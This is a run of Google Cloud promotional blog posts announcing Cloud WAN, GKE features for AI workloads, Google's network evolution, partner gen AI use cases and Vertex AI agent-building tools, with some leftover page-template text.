For over 25 years, Google has pushed the boundaries of the network, with innovations that connect billions of users around the world to essential services like Gmail, YouTube, and Search. At the foundation lies Google’s vast backbone network. With 202 points of presence (PoPs), powered by over 2 million miles of fiber, 33 subsea cables, and backed by a 99.99% reliability SLA, Google’s network provides a robust and resilient global platform.
That same planet-scale network infrastructure powers Google Cloud and our Cross-Cloud Network solutions. And today we are announcing that Google’s global network is available for all businesses and governments to use with our new Cloud WAN solution.
Cloud WAN is a fully managed, reliable, and secure enterprise backbone to transform enterprise wide area network (WAN) architectures. It leverages Google’s planet-scale network, which is optimized for application performance. Cloud WAN provides up to 40% faster performance1 compared to the public internet, and up to a 40% savings2 in total cost of ownership (TCO) over a customer-managed WAN solution.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 to try Google Cloud networking’), (‘body’, <wagtail.rich_text.RichText object at 0x3edb1ebc64c0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectpath=/products?#networking’), (‘image’, None)])]>
The evolution of the enterprise WAN
Traditionally, enterprises relied heavily on multiprotocol label switching (MPLS) networks for secure and reliable site-to-site connectivity — a high-cost approach. However, the rapid adoption of SaaS and cloud applications necessitated a transformation, leading to the emergence of SD-WAN with direct internet access (DIA), a lower-cost alternative that leveraged the internet. Then, to enhance application performance, enterprises built colocation-based cloud on-ramps, which, while improving latency, introduced complexity and costs. This evolution led to a proliferation of security stacks, with a mix of security service edge (SSE) and self-managed appliances, creating an inconsistent security posture.
Consequently, enterprise connectivity has become inherently complex and difficult to manage, marked by diverse networks with fragmented security, and requiring a constant balancing of reliability, speed, and cost.
The rapid emergence of AI has placed additional demands on enterprise networks. AI-based applications require a highly distributed infrastructure that is often spread across different clouds and on-premises data centers, and need a global network that can scale massively, provide robust security and privacy, and make efficient use of resources, all while remaining cost-effective.
To address these needs, Cloud WAN offers a unified enterprise network solution for securely and reliably connecting across any enterprise site, application and user, while helping to ensure optimal performance and reducing costs.
Cloud WAN enables two key use cases: providing high-performance connectivity between geographically dispersed data centers, and connecting branch and campus environments over our Premium Tier network.
Use case 1: High performance, cross-region connectivity
Large, global customers with extensive data center networks need to be able to move large amounts of data reliably. Cloud WAN offers flexible connectivity options for linking geographically dispersed data centers, providing a modern alternative to traditional solutions that have limited capacity, high cost of operations, and lower reliability.
This use case is enabled by these core capabilities:
Cloud Interconnectprovides private and dedicated low-latency connections between Google Cloud regions and on-prem data centers, allowing you to connect your data center to Google Cloud from over 159 locations around the globe.
Cross-Cloud Interconnect enables multicloud connectivity between Google Cloud and other public cloud environments, including AWS, Azure and OCI, and is available in 21 locations.
Now, with Cross-Site Interconnect, we’re enabling dedicated point-to-point layer 2 private 10/100G connectivity optimized to connect applications between data centers, and that is designed for enterprises, government agencies, and telecom operators. With Cross-Site Interconnect, Google Cloud becomes the first major cloud provider to offer transparent layer 2 connectivity over its network. Currently in preview in select countries, we’ll expand it to additional edge locations in the coming year.
Key benefits of Cross-Site Interconnect include:
Enterprise-grade performance: With an SLA and built-in redundancy, and Google’s high performance global network, Cross-Site Interconnect is a high-bandwidth (10/100G) data center interconnect solution.
Global reach and capacity: Cross-Site Interconnect runs over Google Cloud’s global backbone, a network of over 2 million miles of fiber, with international capacityfor trans-Atlantic and trans-Pacific networks.
Optimized for risk and cost: Cross-Site Interconnect leverages redundant fiber infrastructure to dynamically reroute network traffic around physical network and optical-fiber failures, helping to maintain consistent service availability.
Note: Google Cloud additionally supports scalable layer 3 routing solutions with Network Connectivity Center (NCC). Please see the next section for details.
“Having a scalable and reliable global network is critical as we continue to expand our research efforts and host performance sensitive workloads on Google Cloud. We look forward to leveraging the stability and reliability we have seen with Google’s Cloud WAN to meet the growing needs in our hybrid networks.” – Chris Dee, Head of Cloud Platform Engineering, Citadel Securities
Use case 2: Migrate branch and campus networks
Google’s Premium Tier network serves as a powerful cloud on-ramp, helping to securely connect branch offices and campuses to public cloud resources, SaaS applications, and the internet. Cloud WAN is a unified, fully managed solution that extends the performance and reliability of Google’s trusted network directly to enterprises, enabling on-demand, any-to-any connectivity with inherent security and a lower TCO. Furthermore, our open yet tightly integrated ecosystem empowers enterprises with the choice of best-in-class security and network services, fostering flexibility and tailored solutions.
Premium Tier network delivers up to 40% improved performance
The foundation of this performance is Google’s unparalleled backbone network which provides a robust and resilient platform for your applications.
Google’s Premium Tier network service is designed to deliver optimal application performance. It ensures that internet-based traffic targeting Cloud WAN enters and exits Google’s high-performance network at the geographically closest PoP. This minimizes network hops, driving lower latency and a more consistent user experience.
With over 5700 direct peering connections and reachability to 60K+ autonomous system numbers (ASNs), Google ranks first among cloud providers and 6th inglobal peering. This extensive peering network helps ensure efficient traffic exchange with other networks, further enhancing application performance.
Our Verified Peering Provider program allows customers to select ISPs for maximum availability. Now open to all ISPs globally, the program provides redundant, diverse connectivity.
Dedicated fiber accessin partnership with Lumen Technologies (available in select locations in 2025), enables last-mile handoff to Cloud WAN from customer-operated locations including data centers, branches, warehouses, and airports.
BT is enabling their Global Fabric network-as-a-service (NaaS) offering to provide direct connectivity for BT customers to Google Cloud using Cloud WAN
Cloud WAN’s architecture offers flexible options to address modern enterprises’ diverse connectivity requirements. Network Connectivity Center acts as a centralized hub for enterprises to connect their branches using Cloud VPN or their preferred SD-WAN solution, while campuses and data centers can use Cloud Interconnect for high-bandwidth (10G, 100G) links. To further extend the reach and reliability of enterprise networks, site-to-site data-transfer with Network Connectivity Centeris now available in 20 countries across the globe.
“By bridging the edge-cloud gap, Cloud WAN is enhancing our application performance by up to 40%, reducing costs, and providing resilient, scalable support and foundation for our end-to-end digitalization.”– Ralf Huebenthal, Global Head of IT Platforms, Nestle
By combining these powerful network capabilities, Cloud WAN delivers a significant improvement in application experience, empowering businesses to provide their users with the performance they expect.
Cloud WAN lowers TCO by up to 40% Compared with a customer-managed WAN solution, Cloud WAN provides up to a 40% savings in TCO2, offering the flexibility of both usage-based and fixed-price options to suit various needs, and significantly driving down fixed, upfront costs. For organizations that perform high-bandwidth internet data transfers, we are extending a fixed-price model for Cloud Interconnect that will be generally available this quarter. Cloud WAN allows enterprises to consolidate their carrier-neutral facility deployments to fewer cloud regions, reducing costs.
A tightly integrated, open ecosystem for flexibility and choice Cloud WAN has an open, flexible, and tightly integrated ecosystem, providing enterprises with the tools needed to build robust and adaptable networks. Cloud WAN offers easy integration of network and security services from a broad ISV ecosystem:
Strong SD-WAN partner ecosystem, featuring leading vendors including Cisco, Fortinet, Juniper Networks, Netskope, Velocloud, and others. Enterprises can choose to self-manage or consume managed overlay connectivity with our services partners.
Cloud WAN using NCC Gateway (preview in Q2), the first major cloud solution to offer managed integration of security service edge (SSE) for users accessing private and public applications. SSE offerings are available from Broadcom, Menlo Security, and Palo Alto Networks.
You can also extend the benefits of Cloud WAN with partner solutions to build agile, secure, and automated branch networks, facilitating rapid deployment of new branches and services enabled with:
Infoblox Universal DDImodernizes and simplifies branch networks by delivering infrastructure-free, cloud-based Domain Name Service (DNS), Dynamic Host Configuration Protocol (DHCP), and IP Address Management (IPAM). An optional DNS security component protects against phishing and malware, ensuring your users connect safely to critical applications.
Juniper Networks Mist provides AI-driven campus and branch transformation, including comprehensive insight and automation to optimize user experiences. This integration includes cloud-delivered critical network services like Wi-Fi, wired access, SD-WAN, network access control (NAC), indoor location services, and IoT analytics.
Integration with Google Distributed Cloud (GDC) in a connected configuration, extending Google Cloud’s computing benefits to the edge for latency-sensitive applications. GDC is a fully managed platform supporting containerized and VM-based applications, with automated connectivity back to Google Cloud regions using Cloud WAN.
Partner-managed services
Enterprises who already rely on managed services providers for their enterprise backbone needs can continue to work with their preferred partners when migrating to Cloud WAN. And for enterprises that want help migrating, deploying and operating Cloud WAN, they can engage with one of our global system integrator (GSI) partners. At launch, Cloud WAN partners include Accenture, HCLTech, and Wipro, who now offer services architecture, design, migration and ongoing management services.
Learn more
Cloud WAN stands to revolutionize how enterprises connect and secure their global infrastructure. Offering simplicity, high performance, a wealth of connectivity and security service choices, not to mention significant cost savings, Cloud WAN lets you focus on innovation and growth in the cloud and beyond.
1. During testing, network latency was more than 40% lower when traffic to a target traveled over the Cross-Cloud Network compared to when traffic to the same target traveled across the public internet. 2. Architecture includes SD-WAN and 3rd party firewalls, and compares a customer-managed WAN using multi-site colocation facilities to a WAN managed and hosted by Google Cloud.
The age of AI is now. In fact, the global AI infrastructure market is on track to increase to more than $200 billion by 2028.
However, working with massive data, intricate models, and relentless iterations isn’t easy, and adapting to this new era can be daunting. Platform engineering and infrastructure teams that have invested in Kubernetes may wonder: “After years of building expertise in container orchestration to operate production workloads at scale, how do I enable this next generation of AI workloads?”
The good news? You don’t need to start from scratch. You’re well on your way — your Kubernetes skills and investments aren’t just relevant, they’re your AI superpower.
Cluster Director for GKE, now generally available, lets you deploy and manage large clusters of accelerated VMs with compute, storage, and networking — all operating as a single unit.
GKE Inference Quickstart, now in public preview, which simplifies the selection of infrastructure and deployment of AI models, while delivering benchmarked performance characteristics.
GKE Inference Gateway, now in public preview, provides intelligent routing and load balancing for AI inference on GKE.
A new container-optimized compute platform is rolling out on GKE Autopilot today, and in Q3, Autopilot’s compute platform will be made available to standard GKE clusters.
Gemini Cloud Assist Investigations, now in private preview,helps with GKE troubleshooting, decreasing the time it takes to understand the root cause and resolve issues.
With a built-in partnership with Anyscale, RayTurbo on GKE will launch later this year to deliver superior GPU/TPU performance, rapid cluster startup, and robust autoscaling.
Read on for more details about these announcements.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud containers and Kubernetes’), (‘body’, <wagtail.rich_text.RichText object at 0x3edb1c2fdb50>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectpath=/marketplace/product/google/container.googleapis.com’), (‘image’, None)])]>
Scale your AI workloads with Cluster Director for GKE
As AI models grow in size and demand more machines for compute processing, platform teams need to deliver new architectures to deploy models across multiple hosts and operate massive clusters of GPUs and TPUs as a single unit. Without these capabilities, customers often struggle to complete large training jobs and to deliver the inter-machine performance they need for AI.
To handle these scaling challenges, our supercomputing services, Cluster Director for GKE (formerly Hypercompute Cluster), is now generally available. With Cluster Director for GKE, you can deploy and manage large clusters of accelerated VMs with compute, storage, and networking — all operating as a single unit. It delivers exceptionally high performance and resilience for large distributed workloads by automatically repairing faulty clusters based on their bill of health.
One of the best things about Cluster Director for GKE is that you can orchestrate all of this through standard Kubernetes APIs, and ecosystem tooling. There are no new platforms — just new capabilities on the platform you already know and love. You can use GKE node labels to:
Report and replace faulty nodes by gracefully evicting workloads from the node and automatically replacing them with spare capacity within your co-located zone.
Manage host maintenanceso you can manually start host maintenance from GKE or use maintenance information while scheduling your workloads.
We are seeing a clear trend in the age of AI: amazing innovation is happening where traditional compute interacts with neural networks — otherwise known as “inference.” Companies operating at the cutting edge of Kubernetes and AI, like LiveX and Moloco, run AI inference on GKE.
Customers and platform teams deploying AI inference on Kubernetes tell us they face two key challenges:
Balancing performance and cost: Tuning accelerators to meet the right performance targets without overprovisioning requires extensive knowledge of Kubernetes, AI models, GPU/TPU accelerators, and specific inferencing metrics like Time To First Token (TTFT).
Model-aware load balancing: With AI models, response length is often highly variable from one request to another, so response latency varies widely. This means traditional load balancing techniques like round-robin can break down, exacerbating latency and underutilizing accelerator resources.
To address these challenges, we’re introducing new AI inference capabilities in GKE:
A new GKE Inference Quickstart, now in public preview, lets you pick an AI model and then provides a set of benchmarked profiles to choose from. The profiles include infrastructure configuration, GPU/TPU accelerator configuration, and Kubernetes resources needed to match a set of AI performance characteristics like TTFT.
GKE Inference Gateway, now in public preview, reduces serving costs up to 30%, tail latency by up to 60%, and increases throughput by up to 40%. Customers get a model-aware gateway optimized for intelligent routing and load balancing, including advanced features for routing to different model versions.
The best solutions to complex problems meet you where you are and point you to what’s next. The combination of the GKE Inference Quickstart and GKE Inference Gateway do just that.
Optimize workloads with GKE Autopilot
Optimizing cloud usage and cost savings continues to be a top priority for both Google Cloud and for cloud users, with 71% naming it as their top initiative for the year. If you’re running web and API servers, queue processors, CI/CD agents, or other common workloads, you’re likely over-provisioning some resources to make your apps more responsive. GKE customers often request more compute resources than they use, leading to underutilization and unnecessary costs.
In 2021, we launched GKE Autopilot to combat overprovisioning. Autopilot dramatically simplifies Kubernetes cluster operations and enhances resource efficiency. More and more customers, including Toyota and Contextual AI, are turning to Autopilot for critical workloads. In fact, 30% of active GKE clusters created in 2024 were created in Autopilot mode.
Today, we are announcing new performance improvements to GKE Autopilot, including faster pod scheduling, scaling reaction time, and capacity right-sizing — all made possible by unique hardware capabilities only available on Google Cloud. With Autopilot, your cluster capacity is always right-sized, allowing you to serve more traffic with the same resources or existing traffic with fewer resources.
Currently, Autopilot consists of a best-practice cluster configuration and a container-optimized compute platform that automatically right-sizes capacity to match your workloads. Many customers have told us that they want to right-size capacity on their existing clusters without having to use a specific cluster configuration. To help, starting in Q3, Autopilot’s container-optimized compute platform will also be available to standard GKE clusters, without requiring a specific cluster configuration.
Save time with Gemini Cloud Assist
Nothing slows down the pace of innovation like having to diagnose and debug a problem in your application. Gemini Cloud Assist provides AI-powered assistance across the application lifecycle, and we’re unveiling the private preview of Gemini Cloud Assist Investigations, which helps you understand root cause and resolve issues faster.
The best part? It’s all available right from the GKE console, so you can spend less time troubleshooting and more time innovating. Sign up for the private preview to be able to:
Diagnose pod and cluster issues from the GKE console — even across other Google Cloud services such as nodes, IAM, or load balancers.
See observations from logs and errors across multiple GKE services, controllers, pods, and underlying nodes.
Kubernetes is the open infrastructure platform for AI
For organizations looking for a comprehensive machine learning platform, we recommend Vertex AI, a unified AI development platform for building and using generative AI on Google Cloud. With access to Vertex AI Studio, Agent Builder, and over 200 models in Model Garden — plus the ability to call it from GKE — it’s a great option if you’re looking for an easy-to-use solution.
Over the last decade, Kubernetes has earned its spot as the de-facto standard for hosting cloud-native applications and microservices. Today, organizations that need deep control over their infrastructure are once again turning to Kubernetes to build their AI training and inference platforms. In fact, IBM, Meta, NVIDIA, and Spotify all use Kubernetes for their AI/ML workloads.
To make Kubernetes an even better platform for AI, we’re proud to lead and contribute alongside these companies (and more with the Cloud Native Computing Foundation) to create exciting open source innovations:
Built with Intel, NVIDIA, and more, Dynamic Resource Allocation simplifies and automates hardware allocation and scheduling to pods and workloads.
Developed in conjunction with Apple, Red Hat, and others, Kueue and JobSet provide powerful AI training orchestration, streamline job management, and optimize accelerator utilization.
Partnering with DaoCloud, we built LeaderWorkerSet, which enables deployment and management of large, multi-host AI inference models via a Kubernetes-native API.
Empower data scientists and AI/ML engineers with Ray on GKE
Platform teams have historically relied on Kubernetes and GKE to serve the needs of software engineers building microservices and related cloud-native applications. With increased AI usage, these same platform teams now need to serve a new user base: data scientists and AI/ML engineers. However, most data scientists and AI/ML engineers aren’t familiar with Kubernetes and need a simpler, more approachable way of interacting with distributed infrastructure.
To curb the steep learning curve, many organizations turn to Ray, an open-source framework that provides an easy way for AI/ML engineers to develop Python code on their laptops and then scale that same code elastically across a Kubernetes cluster.
We’re committed to making Kubernetes the best platform for using Ray, and have been working closely with Anyscale, the creators of Ray, to optimize open-source Ray for Kubernetes. Today, inpartnership with Anyscale, we’re announcing RayTurbo on GKE, an optimized version of open-source Ray. RayTurbo delivers 4.5x faster data processing and requires 50% fewer nodes for serving. On GKE, RayTurbo will take advantage of faster GKE startup times, high-performance storage for model weights, TPUs, and better resource efficiency with dynamic nodes and superior pod scalability. RayTurbo on GKE will launch later this year.
Better together: GKE and AI
AI introduces new challenges for platform teams, but we’re confident that the technology and products that you already use — Kubernetes and GKE — can help you tackle them. With the right foundation, platform teams can expand their scope to support data scientists and AI/ML engineers in addition to software engineers.
This confidence is grounded in experience. At Google, we use GKE to power our leading AI services — including Vertex AI — at scale, relying on the same technologies and best practices that we’re sharing with you today.
Ready to start using Kubernetes for the next generation of AI workloads? We look forward to watching you succeed on GKE.
From answering search queries, to streaming YouTube videos, to handling the most demanding cloud workloads, for over 25 years, we’ve been relentlessly pushing the boundaries of network technology, building a global infrastructure that powers Google and Google Cloud for billions of users and enterprise customers globally. We now stand at another pivotal moment, driven by the transformative power of AI, and our network is once again evolving to meet the challenges and opportunities of this new era.
Here’s a look behind the scenes at the evolution of our global network, from enabling the early days of web search, to today, powering demanding AI workloads to bring AI’s benefits to everyone — people and businesses alike.
Our network’s evolution
There have been several fundamental inflection points for the Google network over the last 25 years, leading to three distinct networking eras:
Internet era: Our journey began in the internet era, when we primarily focused on offering our users across the globe a consistently high-quality experience in terms of reliability and latency — whether they were using Search, Maps, or Gmail. Key innovations included the B2 network; Bandwidth Enforcer (BwE); B4, our first fully software-defined backbone; our Orion software-defined network (SDN) controller; and our petabit-scale SDN data-center fabric, Jupiter.
Streaming era:With the advent of YouTube and similar services, streaming video became a significant portion of global internet traffic — a trend that continues even today. We adapted our network to deliver low-jitter and high-quality video around the world through technologies such as Google Global Cache, Espresso, QUIC, and TCP BBR.
Cloud era: The rise of cloud computing demanded greater resiliency, multi-tenancy, and security, which inspired innovations such as Andromeda, gRPC, PSP, and Swift.
Alongside technology innovations, our network footprint had to scale continuously to reach every Google user and customer with a consistent, high-quality experience. Today, this network spans over 2 million miles of lit fiber, including 33 subsea cable investments, with 202 network edge locations and more than 3,000 media content delivery network (CDN) locations across the globe. It connects 42 Google Cloud regions and 127 zones. We are also the most deeply peered cloud service provider network in the world.
AI is driving unprecedented network demands
As Sundar noted in his Google I/O 2024 keynote, we’ve been AI-first in our approach for more than a decade, investing in and innovating at every layer of the stack. From research and products to infrastructure — our global network fuels these AI innovations and brings them to you wherever you are in the world. All 15 of our half-billion-user products — including seven with 2 billion users — are powered by our Gemini model, and all of them rely on the Google global network to bring us closer to our ultimate goal: making AI helpful for everyone. We take this responsibility very seriously.
The AI era presents unique challenges that require a fundamental rethinking of our network architecture from four key perspectives:
The wide area network (WAN) is the new local area network (LAN):In the AI era, we train the largest of our foundation models across multiple campuses and even multiple metros to pool together large numbers of TPUs. The need for scalability has never been this acute, both for Gemini and for our customers building foundation models on Google Cloud infrastructure. Moreover, these ML applications haveunique traffic patterns, such as highly bursty elephant flows. Understanding and managing these flows is critical for efficient network performance.
AI demands zero impact from any outages: AI foundation model training, fine-tuning and inferencing are intensive processes that rely on valuable GPU/TPU resources, and a prolonged outage can be very disruptive to them. In other words, network disruptions are simply unacceptable — our customers expect always-on connected network capacity.
A heightened need for security and control: AI models and the data they are trained on must be protected to ensure their integrity. In addition, there are evolving compliance requirements for AI models from different regions and for data in transit.
Operational excellence: From creating site reliability engineering (SRE) principles and leveraging AI/ML innovations in operations, to finding failure root causes using ML, we’re always exploring new ways to deliver excellence in our network operations. Simultaneously, the challenges of costs and complexity associated with linear scaling have pushed us to seek solutions that are efficient and sustainable for our customers.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 to try Google Cloud networking’), (‘body’, <wagtail.rich_text.RichText object at 0x3edb1bf19100>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectpath=/products?#networking’), (‘image’, None)])]>
New network design principles and innovations
To address these challenges, we’ve reimagined our next-generation network from the ground up, establishing four new design principles.
Exponential scalability: Our network needs the ability and agility to handle massive amounts of data and traffic, especially in key regions serving AI traffic. The need for scalability has never been greater. In the AI era, the WAN is the new LAN and the continent is the data center.
Beyond-9s reliability: The industry has traditionally understood reliability in terms of “3 9s,” “4-9s” or “5-9s” of availability. Increasingly, that is simply not enough, as long-tail events, well within the x-9s specifications, matter as much as the average reliability of the network. Our users and customers expect deterministic performance, a limited impact radius for incidents, and proactive and ultra-fast mitigation. We are embarking on a journey to go “beyond 9s.”
Intent-driven programmability: Billions of people use our network. They have unique requirements for security, compliance, resiliency, performance, and efficiency. To address all these requirements, we need a fully intent-driven, highly programmable network.
Autonomous network: Automation and zero-touch have been buzzwords for the last decade. To support the next decade’s demands, we need autonomous networks that can run at scale 24×7 with minimal human intervention.
Guided by these four design principles, we have built our next-generation global network by making foundational networking advancements.
Multi-shard network: We are moving beyond traditional vertical scaling limitations to elastic, horizontal scalability with our multi-shard network architecture. Each network shard is independent and enables horizontal scaling; not only can we scale the network within a shard, but we can scale the number of shards in the network. This allows for swift and substantial WAN bandwidth growth to support AI infrastructure demands. In fact, from 2020 to 2025, our WAN bandwidth grew a whopping 7x.
Multi-shard isolation, region isolation, and protective reroute: Each of our network shards has its own control plane, data plane, and management plane, and operates independently of other shards. This multi-shard isolation enables a high level of resiliency that’s rare for global backbones at our scale; in fact, it parallels the level of resiliency typically achieved via multiple independent global ISPs, without the associated complexity of managing multiple networks. Regional isolation minimizes the impact of failures and limits the impact radius. Protective ReRoute, a transport technique for shortening user-visible outages, glues it all together – it lets hosts promptly detect and route around any network failures within a few seconds. With Protective ReRoute deployed in our network, we have observed up to 93% reduction in cumulative outage minutes.
Fully intent-driven, fine-grained programmability: We’ve built a highly programmable network with SDN controllers, standard APIs, and universal network models such as the Multi-Abstraction-Layer Topology representation, or MALT. This enables fully intent-driven network controls that allow us to tailor our network to specific application needs, and meet the unique needs of our customers. For example, these controls can be used for regulatory compliance and data sovereignty, including control over data in motion.
Autonomous network: Over the last decade, we’ve transformed our network, moving from event-driven to machine-driven to now autonomous operations. This journey is fueled by ML, which provides us with actionable intelligence. Inspired by Google DeepMind’s work with graph neural networks (GNN) for accurate arrival-time predictions in Google Maps, we used GNN to create a digital twin of our network. This twin lets us predict and prevent outages, quickly pinpoint failures and their root causes, and optimize network capacity planning. As a result, we’ve observed failure mitigation times improve from hours to minutes, boosting our network’s efficiency and resilience with minimal human intervention.
A network to unlock the full potential of AI
For cloud customers, Google’s global network offers the capacity, elasticity, and scale to deploy and leverage AI effectively, 24×7 app resilience with a reliable network, security through zero-trust principles, and performance that meets the needs of AI/ML applications. Furthermore, AI-driven efficiencies reduce maintenance toil, enable faster recovery, and improve ROI. And with Cloud WAN, starting today, Google Cloud customers can use Google’s global network to connect their global enterprises. For end users, this translates to expanded global reach, resilient mission-critical applications, zero-trust security to protect their data, and a performant network for power-intensive real-time apps. Taken together, these help ensure a great user experience.
This is a truly exciting time as we continue to push the boundaries of network technology and realize the transformative potential it holds for our customers in the AI era.
To learn more, we invite you to join us at our Google Cloud Next 2025 session, where we’ll share more details and demonstrate how our network continues to uphold Google’s mission and drive our customers’ success in the Gemini era. Keep an eye out for future blogs about the groundbreaking innovations that are powering Google’s next-generation global network.
Like many of you reading this, I fancy myself a builder. I got my first taste of making a computer do something based on code I wrote into a TI-99 console when I was 8 years old and was hooked. In the four decades that have followed, I’ve seen hundreds, maybe even thousands of developers and companies transform as we shifted from the internet to client-server to mobile and to cloud.
I’ve not seen anything quite as transformative quite as fast as what we’re seeing now, helping companies harness AI to transform their software development, business process, information retrieval, and more.
As part of our commitment to offering the most open and innovative generative AI partner ecosystem, we’re lucky enough to work with the most cutting-edge software companies in the world. As we head into Google Cloud Next ‘25 this week, we thought it might be inspiring to showcase the following 34 use cases illustrating how companies are using AI to transform how they work — moving beyond hype and into production. And if you want even more examples, check out our list of hundreds of real-world gen AI use cases we’ve helped build with our customers and partners.
Hope to see you at Next!
AES – Enabling a massive audit process overhaul with accuracy, speed, and scale with gen AI agents built using Vertex AI and Anthropic’s Claude models.
Airwallex – Detecting and managing fraud in real time in a scalable, always-available environment with Vertex AI, GKE, and GitLab.
Allegro – Enabling millions of real-time, personalized conversations with AI-powered omnichannel orchestration with Google Cloud and GrowthLoop.
BrainLogic – Improving digital commerce experiences with Zapia, a uniquely Latin American personal AI assistant, built with Vertex AI and Anthropic’s Claude models.
Bud Financial – Creating new ways of working and new operating models for financial institutions with Vertex AI and Astra DB from DataStax.
Capital Energy – Taking sustainable energy to new heights with secure cloud technologies, AI, and data platforms with Vertex AI and Fortinet.
CERC– Processing millions of credit data forecasts in minutes with near real-time insights and reduced costs with Databricks on Google Cloud.
Copel – Providing real-time insights with a natural language AI agent that interacts directly with SAP ERP using Google Cloud Cortex Framework.
Cox 2M – Reducing time to insights for non-technical users by 88% with natural-language chat and gen AI with Gemini and ThoughtSpot.
Far Eastern New Century – Streamlining cross-border operations with generative AI with Google Cloud VMware Engine and Microfusion.
Flockx – Combating loneliness by connecting individuals with AI Agent communities via their Collaboration Layer built with Google Cloud and Elastic.
HDFC ERGO – Pioneering insurance superapps for India with personalized AI-driven services at scale with Vertex AI, Niveus Solutions, and Lumiq.
Hunkemöller – Building advanced AI solutions and a game-changing customer data platform for an SAP shop with Vertex AI and Devoteam G Cloud.
Israel Antiquities Authority – Preserving the past for future generations with modern research models with Gemini, NetApp, VMWare, and CommIT.
LiveX AI – Reducing customer support costs by up to 85% with AI agents trained and served on Google Kubernetes Engine and NVIDIA AI.
L’Oréal – Delivering a flexible and scalable set of declarative generative AI APIs, in 3 months, for secure access to gen AI for all with Gemini and LangChain.
Maqqie – Transforming the future of HR recruitment and driving increased revenue and retention with Vertex AI and Rappit.
Mercari – Dramatically improving the user experience for both buyers and sellers on its ecommerce marketplace with Vertex AI and Weights & Biases.
Naologic – Democratizing access to AI for all companies—regardless of IT expertise—with Gemini, Google Cloud for Startups Cloud Program, and MongoDB.
NotCo – Transforming its operations with Google Cloud AI agents and Google Cloud Cortex Framework with SAP and Eleven Solutions.
Palo Alto Networks – Speeding software development with Vertex AI and Anthropic’s Claude and protecting cybersecurity with NVIDIA and Google Cloud.
Quora – Powering millions of human-like daily interactions through dynamic gen AI chat experiences with Gemini, Vertex AI, and Anthropic’s Claude.
Rapid7 – Improving customer experiences with efficient cybersecurity customer support, at lightning speed, with Gemini and Ask AI.
Replit – Making software creation accessible and efficient for everyone with Gemini and Anthropic’s Claude.
Stax AI– Automating manual processes and transforming massive volumes of trust accounting data in minutes with Google Cloud and MongoDB.
Studiosus Reisen – Embracing the future of travel with real-time customer bookings with Vertex AI, SAP, happtiq, and Solid Cloud.
Sumitomo Rubber Industries – Accelerating software development time and delivering innovative products faster with Gemini and Kyocera.
Suzano – Enhancing cloud-based data sources for sustainable materials management on SAP with Gemini, Google Cloud Cortex Framework, and Sauter.
UDN Group – Improving clickthrough rates, enhancing operational efficiency, and providing highly reliable digital media services with Vertex AI and Merkle.
Vodafone – Providing clear customer insights and actionable decision intelligence with a 360-customer view for improved service experiences with Google Cloud and Quantexa.
Wayfair – Driving AI innovation in e-commerce with curated options that elevate online shopping experiences using Google Cloud and Snorkel
WealthAPI – Delivering next-gen financial insights in real time to millions of customers for personalized guidance at scale with Gemini and DataStax Astra DB.
Writer – Building and training over 17 large language models (LLMs) that scale up to 70 billion parameters for custom AI models with Google Cloud and NVIDIA.
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3edb1e65e550>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
These partners are driving a wave of generative AI innovation, building next-generation applications and models, and integrating their solutions with powerful Gemini, Vertex AI, and BigQuery features. These advancements are helping customers realize the value of generative AI faster than ever before. Explore more stories to learn how our open partner ecosystem is supporting customer gen AI deployments, and discover how our partners simplify the discovery, procurement, and deployment of groundbreaking generative AI solutions in the Google Cloud Marketplace.
Every enterprise will soon rely on multi-agent systems – multiple AI agents working together – even when built on different frameworks or providers. Agents are intelligent systems that can act on your behalf using reasoning, planning, and memory capabilities. Under your supervision, they can think multiple steps ahead and accomplish tasks across various systems.
Multi-agent systems rely on models with enhanced reasoning capabilities, like those available in Gemini 2.5. They also depend on integration with your workflows and connection to your enterprise data. Vertex AI – our comprehensive platform to orchestrate the three pillars of production AI: models, data, and agents – seamlessly brings these elements together. It uniquely combines an open approach with comprehensive platform capabilities to ensure agents perform reliably: a combination that would otherwise require fragmented and fragile solutions.
Today, we’re announcing multiple enhancements to Vertex AI so you can:
Build agents with an open approach and deploy them with enterprise-grade controls
Agent Engine is a fully managed runtime in Vertex AI that helps you deploy your custom agents to production with built-in testing, release, and reliability at a global, secure scale.
Connect agents across your enterprise ecosystem
Agent2Agent protocolgives your agents a common, open language to collaborate – no matter which framework or vendor they are built on. We are driving this open initiative, partnering with 50+ industry leaders (and growing) to advance our shared vision of multi-agent systems.
Equip agents with your data using open standards like Model Context Protocol (MCP) or connect directly with APIs and connectors managed in Google Cloud. You can ground your AI responses in Google Search, your preferred data sources, or with Google Maps data.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3edb1c6b3820>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
Introducing Agent Development Kit and Agent Garden: Building agents with an open approach
Agent Development Kit (ADK) is our new open-source framework that simplifies the process of building agents and sophisticated multi-agent systems while maintaining precise control over agent behavior. With ADK, you can build an AI agent in under 100 lines of intuitive code. Check out the examples here.
Currently available in Python (more languages coming later in the year), you can:
Shape how your agents think, reason, and collaborate through deterministic guardrails and orchestration controls, giving you precise control over agent behavior and decision-making processes.
Interact with your agents in human-like conversations with ADK’s unique bidirectional audio and video streaming capabilities.With just a few lines of code, you can create natural interactions that change how you work with agents – moving beyond text into rich, interactive dialogue. Check out the demo of an interactive agent from the opening keynote at NEXT 2025 built on the ADK here.
Jumpstart your development with Agent Garden, a collection of ready-to-use samples and tools directly accessible within ADK. Leverage pre-built agent patterns and components to accelerate your development process and learn from working examples.
Choose the model that works best for your needs. ADK works with your model of choice – whether it is Gemini or your any model accessible via Model Garden. Beyond Google’s models, you can choose across 200+ models from providers like Anthropic, Meta, Mistral AI, AI21 Labs, CAMB.AI, Qodo, and more.
